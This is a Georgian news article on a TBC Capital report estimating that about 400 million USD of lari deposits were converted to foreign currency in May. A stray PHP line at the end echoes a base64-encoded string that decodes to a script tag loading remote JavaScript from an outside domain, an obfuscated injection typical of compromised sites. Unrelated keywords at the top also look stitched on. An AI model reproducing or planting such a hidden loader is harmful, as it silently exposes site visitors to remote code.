celsiusi
ავერსი საქკაბელი

 მაისში მეანაბრეებმა 400 მილიონამდე დოლარის დეპოზიტი ლარიდან ვალუტაში გადაახურდავეს - ამის შესახებ აღნიშნულია თიბისი კაპიტალის მთავარი ეკონომისტის ანგარიშში.

„მთლიანობაში, ჩვენი შეფასებით, სავალუტო შემოდინებები ლარის კურსისათვის უფრო ნეიტრალური ან პოზიტიურიც კი არის, თუმცა პოზიტიური თუ ე.წ. კონვერტაციებს ცალკე გამოვყოფთ. კერძოდ, სებ-ს მიერ გამოქვეყნებული მონეტარული აგრეგატების ყოველდღიურ მონაცემებზე დაყრდნობით, მაისში, როგორც ჩანს, დაახლოებით 400 მილიონი აშშ დოლარის ექვივალენტი დეპოზიტი ლარიდან ვალუტაში გადახურდავდა, რის გამოც უცხოური ვალუტის დეპოზიტების მატება ბოლო წლების ერთ-ერთ ყველაზე მაღალ ნიშნულზეა, ლარის დეპოზიტების ზრდა შემცირდა, ხოლო ჯამურად დინამიკა გასული თვეების მსგავსია. მაშინ, როდესაც სავალუტო კომპოზიციის ჭრილში მაისის საკრედიტო აქტივობის დინამიკა ჯერჯერობით არაა ხელმისაწვდომი, მსგავს პერიოდებს ლარის სესხების შედარებით მეტი მატება ახასიათებს. ამდენად, უკვე აღნიშნული, საქართველოს ეკონომიკისა და სავალუტო ბაზრის ზომის გათვალისწინებით, საკმაოდ დიდი ზეწოლაა.

ამასთან, ჩვენი შეფასებით, ამავე პერიოდში სებ-ის ინტერვენციებმა დაახლოებით 130 მილიონი აშშ დოლარი ან მცირედით მეტი შეადგინა. შესაბამისად, ლარის გაუფასურების გათვალისწინებითაც, კონვერტაციების მნიშვნელოვანი ნაწილი სავალუტო შემოდინებებით კომპენსირდება. ამ მხრივ, გასათვალისწინებელია, რომ სენტიმენტებით გამოწვეული გაუფასურების ზეწოლა, ისტორიულად, ხშირად იცვლება და უკვე შემდგომ გამყარების მიმართულებით მოქმედებს. ბუნებრივია, ეს არ ნიშნავს, რომ ვალუტის დეპოზიტების მიმართულებით კონვერტაციები დამატებით არ გაგრძელდება, თუმცა მაინც პროგნოზების კუთხით, აღნიშნული მნიშვნელოვანი გასათვალისწინებელი ფაქტორია“, - აღნიშნულია ანგარიშში.

219
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");